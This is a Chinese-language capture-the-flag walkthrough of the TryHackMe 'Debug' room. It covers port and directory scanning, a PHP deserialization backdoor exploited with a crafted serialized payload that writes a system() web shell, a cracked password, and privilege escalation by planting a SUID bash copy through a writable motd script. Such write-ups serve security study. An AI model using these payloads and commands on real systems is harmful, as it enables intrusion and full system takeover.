打靶记录(一一二)之THMDebug

端口扫描

nmap --min-rate=10000 -p- debug.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-27 11:24 UTC
Nmap scan report for debug.thm (10.10.2.3)
Host is up (0.0060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:39:10:22:A6:7F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds

nmap -sC -sT -sV -O -p22,80 debug.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-27 11:25 UTC
Nmap scan report for debug.thm (10.10.2.3)
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44ee1eba072a5469ff11e349d7dba901 (RSA)
|   256 8b2a8fd8409533d5fa7a406a7f29e403 (ECDSA)
|_  256 6559e4402ac2d70577b3af60dacdfc67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:39:10:22:A6:7F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 3.8 (96%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 3.10 (92%), Linux 3.12 (92%), Linux 3.19 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds

Getshell

访问80端口，是一个apache的默认界面，扫描目录

feroxbuster -u http://debug.thm/  -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,zip,txt,sql,bak,db,rar  
                                                                                                                                                                                                                 
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.2
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://debug.thm/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.2
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, zip, txt, sql, bak, db, rar]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       15l       74w     6143c http://debug.thm/icons/ubuntu-logo.png
200      GET      375l      968w    11321c http://debug.thm/
200      GET       31l      109w     4091c http://debug.thm/javascripts/default.js
200      GET      574l     1271w    10371c http://debug.thm/style.css
200      GET      204l      469w     5732c http://debug.thm/index.php
301      GET        9l       28w      311c http://debug.thm/javascript => http://debug.thm/javascript/
200      GET        2l       20w       94c http://debug.thm/message.txt
301      GET        9l       28w      307c http://debug.thm/backup => http://debug.thm/backup/
200      GET      574l     1271w    10371c http://debug.thm/backup/style.css
200      GET      375l      968w    11321c http://debug.thm/backup/index.html.bak
200      GET      239l      563w     6399c http://debug.thm/backup/index.php.bak
200      GET       42l      374w     2339c http://debug.thm/backup/readme.md
200      GET       31l      109w     4091c http://debug.thm/backup/javascripts/default.js
200      GET       31l       80w     1112c http://debug.thm/backup/less/mixins.less
200      GET      585l     1455w    12659c http://debug.thm/backup/less/style.less
200      GET     3404l     5575w  2221967c http://debug.thm/backup/grid/base-grid.psd
301      GET        9l       28w      305c http://debug.thm/grid => http://debug.thm/grid/
200      GET     3404l     5575w  2221967c http://debug.thm/grid/base-grid.psd
301      GET        9l       28w      305c http://debug.thm/less => http://debug.thm/less/
200      GET      585l     1455w    12659c http://debug.thm/less/style.less
200      GET       31l       80w     1112c http://debug.thm/less/mixins.less
301      GET        9l       28w      312c http://debug.thm/javascripts => http://debug.thm/javascripts/
[#####>--------------] - 18m   961218/3528992 36m     found:22      errors:217    
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_debug_thm_-1711540027.state ...
[#####>--------------] - 18m   961253/3528992 36m     found:22      errors:217    
[#####>--------------] - 18m   517088/1764368 475/s   http://debug.thm/ 
[####################] - 0s   1764368/1764368 441092000/s http://debug.thm/javascripts/ => Directory listing
[#####>--------------] - 18m   444424/1764368 409/s   http://debug.thm/javascript/ 
[####################] - 0s   1764368/1764368 11310051/s http://debug.thm/backup/ => Directory listing
[####################] - 0s   1764368/1764368 26732848/s http://debug.thm/backup/less/ => Directory listing
[####################] - 0s   1764368/1764368 35287360/s http://debug.thm/backup/javascripts/ => Directory listing
[####################] - 0s   1764368/1764368 3600751/s http://debug.thm/backup/grid/ => Directory listing
[####################] - 1s   1764368/1764368 3042014/s http://debug.thm/grid/ => Directory listing
[####################] - 0s   1764368/1764368 20280092/s http://debug.thm/less/ => Directory listing
[--------------------] - 0s         0/1764368 -       http://debug.thm/icons/ubuntu-logo.png        

有一个/bakcup目录，在里面能得到index.php的源码备份

<?php

class FormSubmit {

public $form_file = 'message.txt';
public $message = '';

ptublic funcion SaveMessage() {

$NameArea = $_GET['name']; 
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];

	$this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

}

public function __destruct() {

file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';

}

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();


?>

有一个FormSubmit类，并且留有一个debug后门，当我们上传一个序列化对象时会进行反序列化，而__destruct这个魔术方法会在对象被反序列化时触发，将成员参数form_file作为文件名,将成员参数中的message内容写到其中

那么可以构造一个FormSubmit对象,写一个一句话木马

<?php

class FormSubmit {
    public $form_file = 'shell.php';
    public $message = '<?php system($_GET["shell"]);';
}

// 创建 FormSubmit 类的实例
$formSubmit = new FormSubmit();

// 序列化对象
$serializedObject = serialize($formSubmit);

// 输出序列化后的对象
echo $serializedObject;

?>

运行结果，传参:

O:10:"FormSubmit":2:{s:9:"form_file";s:9:"shell.php";s:7:"message";s:29:"<?php system($_GET["shell"]);";}

提权

做一个反弹shell,机器上似乎没有nc，那么上传一个php反弹shell,用python开启一个pty

在/var/www/html目录找到一个.htpasswd,里面是james用户的密码哈希,爆破得到密码jamaica

在家目录发现一张root的纸条，james有权限更改ssh的欢迎界面，也许我们能进行命令执行

查找/etc/目录下当前用户有权限写的文件

find /etc/ -type f -perm /u+w

找到

./update-motd.d/10-help-text
./update-motd.d/91-release-upgrade
./update-motd.d/98-fsck-at-reboot
./update-motd.d/98-reboot-required
./update-motd.d/00-header
./update-motd.d/00-header.save
./update-motd.d/99-esm
./update-motd.d/90-updates-available

用于配置用户登录时显示系统信息的机制,更改/update-motd.d/00-header文件，也就是用于ssh连接时显示开头系统信息的标题

加上:

cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash

保存退出后重新ssh连接

/tmp/root_bash -p

现在我们是root!

碎碎念

特意挑了一个PHP反序列化的房间，好久没有接触php反序列化了，之前都是打一些ctf中的web题目，所以这个房间的利用还算是比较简单吧，提权也是比较简单的，稍微了解一下linux中的motd就行